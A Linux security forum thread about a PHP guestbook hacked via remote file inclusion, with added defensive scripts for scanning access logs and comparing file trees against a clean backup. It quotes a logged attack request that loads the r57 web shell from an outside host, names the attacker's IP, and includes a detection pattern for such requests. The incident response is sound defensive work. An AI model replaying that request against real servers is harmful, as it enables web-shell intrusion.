Linux - Security
This forum is for all security-related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
So... it was some form of injection attack on the guestbook PHP which gained some kind of write permissions?
Is that as far as the compromise got before you restored the server? Are you sure admin wasn't taken? You changed the password after restore?
Are you certain the restore is not itself a compromised backup with previous intrusions? Spotting one attack in progress does not always mean that was all that was done or for how long.
For now I would look for a better guestbook or remove that feature.
And look to hardening the box as suggested earlier. I do not think your problem is solved yet until everything mentioned earlier is covered. Good luck.
OK, hacked again... got his IP 88.230.29.147 and found how he got in...
POST /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.turkbanner.net/lang/r57.jpg? HTTP/1.1
I am deleting this module...
You probably have insecure software here. It's no use just removing that module. Is the developer aware of this compromise (r57 injection)? You should also know that if they got access through r57 then they may have installed other software - have you checked and found anything? Has the developer released an updated package that will prevent this form of injection?
Do yourself a favour and investigate & implement mod_security (http://www.modsecurity.org) ASAP if you are running PHP apps. Trust me, I learnt the hard way a year or so ago when someone attacked a faulty PHP app with r57.
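One check a defender can run alongside mod_security is a pass over the web server's access log for requests that hand an external URL to a query parameter, which is the shape of the header.php?tpl_pgb_moddir=http://... request quoted above. The script below is an added example, not code from the thread or from the ModSecurity project; the log lines are constructed (documentation-range client addresses and a placeholder host, with only the request path reused from the post), and the awk assumes combined log format with the request target in field 7.

```shell
#!/bin/sh
# Added example (not from the thread): scan web-server access-log lines for
# query parameters whose value is an external URL, the shape of the
# header.php?tpl_pgb_moddir=http://... request quoted in the post above.
# Assumes Apache/nginx combined log format (request target is field 7).

# Constructed sample log lines: documentation-range client IPs and a
# placeholder host; only the request path is taken from the thread.
SAMPLE_LOG='203.0.113.5 - - [10/Oct/2007:10:15:01 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2007:10:15:07 +0000] "POST /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://rfi-host.example/r57.jpg? HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2007:10:16:02 +0000] "GET /guestbook.php?lang=en&ref=home HTTP/1.1" 200 3048 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2007:10:17:44 +0000] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=HTTPS%3A%2F%2Frfi-host.example%2Fx.txt HTTP/1.1" 200 8120 "-" "Mozilla/5.0"'

# rfi_hits: read log lines on stdin, print "<client-ip> <request-target>" for
# every request whose query string has a parameter set to an http/https/ftp
# URL, after lower-casing and decoding the %3A / %2F escapes that matter.
rfi_hits() {
    awk '
    {
        target = $7
        q = index(target, "?")
        if (q == 0) next
        query = tolower(substr(target, q + 1))
        gsub(/%3a/, ":", query)
        gsub(/%2f/, "/", query)
        if (query ~ /(^|&)[^&=]*=(https?|ftp):\/\//) print $1, target
    }'
}

# count_rfi_hits: number of flagged requests in SAMPLE_LOG (2 for the sample above).
count_rfi_hits() {
    printf '%s\n' "$SAMPLE_LOG" | rfi_hits | wc -l | tr -d ' '
}

# flagged_ips: distinct client addresses behind the flagged requests.
flagged_ips() {
    printf '%s\n' "$SAMPLE_LOG" | rfi_hits | awk '{ print $1 }' | sort -u
}

# Run the scan over the constructed sample when executed directly.
printf '%s\n' "$SAMPLE_LOG" | rfi_hits
```

Run it against a real log with `rfi_hits < /var/log/apache2/access.log` (path is an assumption; use your own). Whether such a request actually pulls in the remote file depends on the PHP ini settings allow_url_fopen and, from PHP 5.2, allow_url_include; turning those off is the root fix next to patching or removing the module, and the log scan tells you whether anyone tried before the fix landed.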
Almost no Windows user could tell you what every file is on their system
Ummm - I don't think I could tell you what EVERY file on my UNIX or Linux system is either. I might tell you whether it is a binary, device, script, text (that is to say TYPE of file) but to actually know the purpose of all the binaries, config files and libraries one gets by default seems a bit much.
Not to say M$ isn't a joke of an OS but expecting people to know what every one of 16,000 to 20,000 files do seems a bit much. Even IT security auditors just check for setuid etc... rather than trying to determine if every file has meaning.
Even if one knew what the files "usually" were there is no guarantee they haven't been modified in some way.
More on this later - first I have to investigate my Solaris "Door" files further...
Sorry, didn't have time to reply earlier.
Yes, all passwords changed. Mod security installed (still needs a bit of config, but it will come).
The restored backup comes from another server that is 'clean' (local server).
File comparison done, and yes, there were other uploaded files!
Honestly, I played with this shell to see what it was capable of... nice job ;-).
So now I'll take a bit of my time to configure modsecurity and optimize it.
Thanks a lot for all your replies!!!
macadam
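The file comparison macadam describes (clean backup against the live server) can be scripted so that every added, removed or changed file under the web root is listed, not only the ones that happen to be noticed. The script below is an added example, not code from the thread; it hashes each regular file with sha256sum (falling back to shasum -a 256) and assumes paths contain no tabs or newlines. The demo function builds two small constructed trees in a temporary directory rather than touching a real server.

```shell
#!/bin/sh
# Added example (not from the thread): list files added, removed or modified
# between a known-clean copy of the web root and the live one, by content hash.
# Assumes sha256sum or shasum is installed and that paths hold no tab/newline.

# file_hash FILE: hex SHA-256 of one file.
file_hash() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1"
    else
        shasum -a 256 "$1"
    fi | cut -d ' ' -f1
}

# tree_hashes DIR: one "hash<TAB>./relative/path" line per regular file.
tree_hashes() {
    ( cd "$1" && find . -type f | while IFS= read -r f; do
          printf '%s\t%s\n' "$(file_hash "$f")" "$f"
      done )
}

# tree_diff CLEAN LIVE: prints "added ./p", "removed ./p" or "modified ./p",
# one per line, sorted. Both listings are tagged and fed to a single awk pass.
tree_diff() {
    {
        tree_hashes "$1" | awk 'BEGIN { OFS = "\t" } { print "C", $0 }'
        tree_hashes "$2" | awk 'BEGIN { OFS = "\t" } { print "L", $0 }'
    } | awk -F '\t' '
        $1 == "C" { clean[$3] = $2; next }
        $1 == "L" { live[$3]  = $2; next }
        END {
            for (p in live) {
                if (!(p in clean))            print "added " p
                else if (clean[p] != live[p]) print "modified " p
            }
            for (p in clean) if (!(p in live)) print "removed " p
        }' | LC_ALL=C sort
}

# demo_tree_diff: build two constructed trees in a temp dir (a "clean" backup
# and a "live" copy with one dropped file, one edited file and one missing
# file), diff them, then clean up.
demo_tree_diff() {
    d=$(mktemp -d) || return 1
    for t in clean live; do
        mkdir -p "$d/$t/modules/postguestbook" "$d/$t/images"
        printf '<?php echo "home"; ?>\n' > "$d/$t/index.php"
        printf '<?php /* guestbook header */ ?>\n' > "$d/$t/modules/postguestbook/header.php"
        printf 'GIF89a placeholder\n' > "$d/$t/images/logo.gif"
    done
    printf 'Deny from all\n' > "$d/clean/.htaccess"            # present only in the backup
    printf 'unknown upload\n' > "$d/live/images/upload.php"    # present only on the live box
    printf '<?php /* edited on the live box */ ?>\n' > "$d/live/modules/postguestbook/header.php"
    tree_diff "$d/clean" "$d/live"
    rm -rf "$d"
}

# Run the demo when executed directly; for a real box call
# tree_diff /path/to/clean/backup /var/www/html (paths are assumptions).
demo_tree_diff
```

The "added" lines are the interesting ones after an r57-style intrusion, since dropped shells and uploads show up there regardless of their name or extension; "modified" lines catch edits to legitimate files such as an include inserted into a template. Hashing both trees from the same machine is deliberate: a compromised server's own checksum tools are not trustworthy, so copy the live tree to the clean host (or mount it read-only) before comparing.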
Good stuff, if you need some help with Mod security 1x rulesets let me know.
Thank you for your proposal. I will come to you if needed ;-)
For the moment, I manage the rules quite well (I have version 2).
I am impressed by this tool...very efficient.
And it even comes with a good 'standard rules' package.